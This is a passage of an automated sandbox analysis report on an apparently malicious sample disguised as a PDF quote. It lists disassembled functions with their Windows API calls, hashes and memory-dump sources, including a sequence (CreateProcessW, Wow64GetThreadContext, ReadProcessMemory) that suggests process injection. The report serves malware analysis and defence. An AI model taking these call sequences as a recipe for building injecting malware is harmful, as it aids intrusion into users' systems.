                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$_memset
                                                                    • String ID:
                                                                    • API String ID: 1505330794-0
                                                                    • Opcode ID: cdb8b32ba3eabb9d7c640c8702002d17a0d9f982e12869ca99252a5dbc22259a
                                                                    • Instruction ID: 6ef4ab1fdbea81c865fb84c6435235cb913a5c745b5eb097b77dda18a3bb4fad
                                                                    • Opcode Fuzzy Hash: cdb8b32ba3eabb9d7c640c8702002d17a0d9f982e12869ca99252a5dbc22259a
                                                                    • Instruction Fuzzy Hash: 0B31A2B0505704CFD720DF24E88579BBBE4FB48748F00192EF59AA72D1DB71A944CB92
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00E858A3
                                                                      • Part of subcall function 00E8A2EB: __NMSG_WRITE.LIBCMT ref: 00E8A312
                                                                      • Part of subcall function 00E8A2EB: __NMSG_WRITE.LIBCMT ref: 00E8A31C
                                                                    • __NMSG_WRITE.LIBCMT ref: 00E858AA
                                                                      • Part of subcall function 00E8A348: GetModuleFileNameW.KERNEL32(00000000,00F233BA,00000104,?,00000001,00000000), ref: 00E8A3DA
                                                                      • Part of subcall function 00E8A348: ___crtMessageBoxW.LIBCMT ref: 00E8A488
                                                                      • Part of subcall function 00E8321F: ___crtCorExitProcess.LIBCMT ref: 00E83225
                                                                      • Part of subcall function 00E8321F: ExitProcess.KERNEL32 ref: 00E8322E
                                                                      • Part of subcall function 00E88CA8: __getptd_noexit.LIBCMT ref: 00E88CA8
                                                                    • RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00E80F53,?), ref: 00E858CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 0a8230672860cfab41cccc4cb56e77bdf7b150f34bb1549a5ec41863995978b7
                                                                    • Instruction ID: 6c77d28866d94166a4c6de4c4b2dbd3f6e7dcba13053cf0a36d0e9c93657e594
                                                                    • Opcode Fuzzy Hash: 0a8230672860cfab41cccc4cb56e77bdf7b150f34bb1549a5ec41863995978b7
                                                                    • Instruction Fuzzy Hash: F301DE72381B15DAE62837B5EC42A6E7388DF82764B50243AF80DBA192DE749E414B61
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EC95F1,?,?,?,?,?,00000004), ref: 00EC9964
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EC95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EC997A
                                                                    • CloseHandle.KERNEL32(00000000,?,00EC95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EC9981
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 13aad0aa2445b02e884204938438091e11c60a5448df3b526ad83fdfbaf0046a
                                                                    • Instruction ID: 60251d4982e0c5705b251091a29e9a3a4f940d514304cadeb0781a6b0a886fa7
                                                                    • Opcode Fuzzy Hash: 13aad0aa2445b02e884204938438091e11c60a5448df3b526ad83fdfbaf0046a
                                                                    • Instruction Fuzzy Hash: 50E0263214121CBBDB211B51EC09FCA7B28AB05B61F108220FB507C0E083B219118788
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EC8DC4
                                                                      • Part of subcall function 00E82ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00E89BA4), ref: 00E82EE9
                                                                      • Part of subcall function 00E82ED5: GetLastError.KERNEL32(00000000,?,00E89BA4), ref: 00E82EFB
                                                                    • _free.LIBCMT ref: 00EC8DD5
                                                                    • _free.LIBCMT ref: 00EC8DE7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                                    • Instruction ID: 125690c39eb818d6c600b9379785c1041716a5edb2c327cb0bf2b828fbe13a8e
                                                                    • Opcode Fuzzy Hash: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                                    • Instruction Fuzzy Hash: CCE012B160270553CA25757C6B40F9317DC5F58365714381EB50EF7582CE24E8828338
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CALL
                                                                    • API String ID: 0-4196123274
                                                                    • Opcode ID: efb9c98e361f2102caa9a8eaf7002db65142a72d9a938a8db85f5849881f8224
                                                                    • Instruction ID: 864de751b71f4d7e104190219ae3877f3a9ab58986b58a189e3e6afb274140ed
                                                                    • Opcode Fuzzy Hash: efb9c98e361f2102caa9a8eaf7002db65142a72d9a938a8db85f5849881f8224
                                                                    • Instruction Fuzzy Hash: EB223C70648201DFCB24DF14D494B6AB7E1BF85348F18A96DE899AB361D731EC85CF42
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 5ad9ad00f9d994e253c789b9c2c722ddde88d3bd10247fae4689bcac64c21dc4
                                                                    • Instruction ID: 8f4ae92b4be37519ecf7357084e323487d6e9f6f60a8b957d64ac0ca5f515284
                                                                    • Opcode Fuzzy Hash: 5ad9ad00f9d994e253c789b9c2c722ddde88d3bd10247fae4689bcac64c21dc4
                                                                    • Instruction Fuzzy Hash: 6931F4B1704506AFC714DF28E8D1E69F3E9FF48368B159629E959CB391DB30E850CB90
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00E64992
                                                                      • Part of subcall function 00E834EC: __lock.LIBCMT ref: 00E834F2
                                                                      • Part of subcall function 00E834EC: DecodePointer.KERNEL32(00000001,?,00E649A7,00EB7F9C), ref: 00E834FE
                                                                      • Part of subcall function 00E834EC: EncodePointer.KERNEL32(?,?,00E649A7,00EB7F9C), ref: 00E83509
                                                                      • Part of subcall function 00E64A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E64A73
                                                                      • Part of subcall function 00E64A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E64A88
                                                                      • Part of subcall function 00E63B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E63B7A
                                                                      • Part of subcall function 00E63B4C: IsDebuggerPresent.KERNEL32 ref: 00E63B8C
                                                                      • Part of subcall function 00E63B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F252F8,00F252E0,?,?), ref: 00E63BFD
                                                                      • Part of subcall function 00E63B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E63C81
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E649D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 1438897964-0
                                                                    • Opcode ID: 3be3ea4d2af1fa8b585c13101ee8862ff0d79a3ffef2785dd0c91936d05fead4
                                                                    • Instruction ID: aa99c3f4196f13fdca1721a01442e50e1513a31a0e3e41aacf8bbf148f5b0efd
                                                                    • Opcode Fuzzy Hash: 3be3ea4d2af1fa8b585c13101ee8862ff0d79a3ffef2785dd0c91936d05fead4
                                                                    • Instruction Fuzzy Hash: EA11CD718143099FC310EF79EC4591AFBE8EB84B50F00951EF084A72F2DB709A49CB82
                                                                    APIs
                                                                      • Part of subcall function 00E8588C: __FF_MSGBANNER.LIBCMT ref: 00E858A3
                                                                      • Part of subcall function 00E8588C: __NMSG_WRITE.LIBCMT ref: 00E858AA
                                                                      • Part of subcall function 00E8588C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00E80F53,?), ref: 00E858CF
                                                                    • std::exception::exception.LIBCMT ref: 00E80F6C
                                                                    • __CxxThrowException@8.LIBCMT ref: 00E80F81
                                                                      • Part of subcall function 00E8871B: RaiseException.KERNEL32(?,?,?,00F19E78,00000000,?,?,?,?,00E80F86,?,00F19E78,?,00000001), ref: 00E88770
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: fc48599393de93299acd749c6d10c7ec4a445718b0ea25db6d470bd39481ca31
                                                                    • Instruction ID: 7c36d314faa6cfd4308413e517e40f3a18fb5d6f70a43cbf2da7cc2b2c1166fe
                                                                    • Opcode Fuzzy Hash: fc48599393de93299acd749c6d10c7ec4a445718b0ea25db6d470bd39481ca31
                                                                    • Instruction Fuzzy Hash: 29F0F43160420D6ACB24BB94EC029EE7BEC9F00314F10642AFF0CB2182EFB1CA5493D1
                                                                    APIs
                                                                      • Part of subcall function 00E88CA8: __getptd_noexit.LIBCMT ref: 00E88CA8
                                                                    • __lock_file.LIBCMT ref: 00E8555B
                                                                      • Part of subcall function 00E86D8E: __lock.LIBCMT ref: 00E86DB1
                                                                    • __fclose_nolock.LIBCMT ref: 00E85566
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: 982b482cf3f3a29990ffbaeec8e1ae752d369dce9315b43386b9af32ee29d190
                                                                    • Instruction ID: 1928e2a0aceb8376e4d2c086d69c40d1defc0329bda8fc1d888366a7a8abe822
                                                                    • Opcode Fuzzy Hash: 982b482cf3f3a29990ffbaeec8e1ae752d369dce9315b43386b9af32ee29d190
                                                                    • Instruction Fuzzy Hash: 40F0B472901A049AD7217B759D027AE77E26F40335F54A249F82CBB1C1CF7C8A419B52
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01AB7A63
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01AB7AF9
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01AB7B1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction ID: 8a8ea16ec569562444b13eef54d216acfc9fe0bd88f1380d89b2741d0ffb57c5
                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction Fuzzy Hash: 9612DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 08cfe22af4df86f4c2b9fd1393e28fb5ef12d6e15c6b4a579ad58a10b4529845
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 1931F774A00105DFCB98EF48C48096AFBA6FF49304B6496A5E40DEB351DB31EDC5CB80
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: ec6e3cce8959bc23a62fc79177fa245e36e282e94ac5a1d0fbc13640cc7f501b
                                                                    • Instruction ID: 74f5b77f98dab113d4d4b0bdbb95ac45abf606777e867e2e9276714288eef0f5
                                                                    • Opcode Fuzzy Hash: ec6e3cce8959bc23a62fc79177fa245e36e282e94ac5a1d0fbc13640cc7f501b
                                                                    • Instruction Fuzzy Hash: 3D413A745443518FDB14DF14C484B1ABBE0BF49358F0998ACE899AB362C732EC85CF52
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 677cc2d4993ce2937701fb73560adf54daba46951dcd1c117814cfa9d4a559df
                                                                    • Instruction ID: b27e9cc51d4a7b6527bae823490f852a7fa90d2978b23fca528a928cec80cf4e
                                                                    • Opcode Fuzzy Hash: 677cc2d4993ce2937701fb73560adf54daba46951dcd1c117814cfa9d4a559df
                                                                    • Instruction Fuzzy Hash: 37212172604A09EBDF148F21FC416AA7BF8FF14394F22942EE58AE5191EB3084D0D755
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 44a044a0672692cd184a63c6da38fb0d0e3ceed364562c3886ff31995605c10d
                                                                    • Instruction ID: 6d905914d483eeddbfeec3edb903fb9d66daddff6de407d37ee09dcacab24ea9
                                                                    • Opcode Fuzzy Hash: 44a044a0672692cd184a63c6da38fb0d0e3ceed364562c3886ff31995605c10d
                                                                    • Instruction Fuzzy Hash: 8E116A75B447029FD728AF29E451962F7F5EF89360B14D82EE95A9B7A1DB30E840CB00
                                                                    APIs
                                                                      • Part of subcall function 00E64D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E64D4D
                                                                      • Part of subcall function 00E853CB: __wfsopen.LIBCMT ref: 00E853D6
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E64F6F
                                                                      • Part of subcall function 00E64CC8: FreeLibrary.KERNEL32(00000000), ref: 00E64D02
                                                                      • Part of subcall function 00E64DD0: _memmove.LIBCMT ref: 00E64E1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                    • String ID:
                                                                    • API String ID: 1396898556-0
                                                                    • Opcode ID: 456a0f1c664aa4da7d7e8836ada4cfdc873627efaea6470b7b4980e7ada51d2d
                                                                    • Instruction ID: ca44478c3282a0b962295688c81d522b15875eb49d48d5044f1d30d2baab7f18
                                                                    • Opcode Fuzzy Hash: 456a0f1c664aa4da7d7e8836ada4cfdc873627efaea6470b7b4980e7ada51d2d
                                                                    • Instruction Fuzzy Hash: BC11E772780209AADF10BF70EC16FAEB7E59F44780F14A829F941B72C1DB719A059B50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 1278fa54da473a1e6bb6fbce57ad649d7b3b365f4f95014a736a9ccdc4eff832
                                                                    • Instruction ID: ffbf2fef4fc1a59d0791ca9da17189d53817d098824dc2036c49ad7b4d4bdcc1
                                                                    • Opcode Fuzzy Hash: 1278fa54da473a1e6bb6fbce57ad649d7b3b365f4f95014a736a9ccdc4eff832
                                                                    • Instruction Fuzzy Hash: 7A2113B09483418FCB14DF14C444A5ABBE0BF89358F09996CE99A6B761D731F849CF92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 80496bd3df0b8ff85686326aad0fe9efef02b0a91f7f5c11b9f899d3f07c813e
                                                                    • Instruction ID: be450d2dfae8fa5c5dc704cb4f461c9a880b9e72daac13a29510929e9d76c36b
                                                                    • Opcode Fuzzy Hash: 80496bd3df0b8ff85686326aad0fe9efef02b0a91f7f5c11b9f899d3f07c813e
                                                                    • Instruction Fuzzy Hash: 6D11E5722492156BC724AF2CE882D6AB3D9EF853A8714522AFD69E7290DB319C10C790
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00E84A16
                                                                      • Part of subcall function 00E88CA8: __getptd_noexit.LIBCMT ref: 00E88CA8
                                                                    Memory Dump Source
